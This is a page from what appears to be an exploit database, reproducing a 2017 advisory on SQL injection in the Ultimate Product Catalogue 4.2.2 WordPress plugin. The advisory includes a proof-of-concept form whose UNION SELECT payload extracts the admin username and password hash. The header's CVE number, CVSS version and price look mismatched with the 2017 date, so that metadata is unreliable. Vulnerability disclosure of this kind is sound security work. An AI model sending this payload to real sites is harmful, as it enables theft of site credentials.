Advertisement






WordPress Plugin Ultimate Product Catalogue 4.2.2 SQL Injection

CVE Category Price Severity
CVE-2020-10636 CWE-89 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2017-06-28
CPE
cpe:cpe:/a:wordpress:wordpress_plugin_ultimate_product_catalogue:4.2.2
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017060210

Below is a copy:

 WordPress Plugin Ultimate Product Catalogue 4.2.2 SQL Injection# Exploit Title: Ultimate Product Catalogue 4.2.2 Sql Injection  Plugin WordPress  Sql Injection
# Exploit Author: Lenon Leite
# Vendor Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/

# Software Link: https://wordpress.org/plugins/ultimate-product-catalogue/
# Contact: http://twitter.com/lenonleite
# Website: http://lenonleite.com.br/
# Category: webapps
# Version: 4.2.2
# Tested on: Ubuntu 16.04

1 - Description:

Type user access: register user.

$_POST[CatID] is not escaped.

http://lenonleite.com.br/en/blog/2017/05/31/english-ultimate-product-catalogue-4-2-2-sql-injection/

2 - Proof of Concept:

1  Login as regular user (created using wp-login.php?action=register):

2  Using:

<*form method="post"
action="http://target/wp-admin/admin-ajax.php?action=get_upcp_subcategories">
<*input type="text" name="CatID" value="0 UNION SELECT
user_login,user_pass FROM wp_users WHERE ID=1">
<*input type="submit">

*delete * in code*

3 - Timeline:

- 22/05/2017  Discovered
- 24/05/2017  Vendor not finded
- **/06/2017 - Corrected

***Rename plugin txt to zip. Problem with gmail block.
-- 
*Atenciosamente*

*Lenon Leite*

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum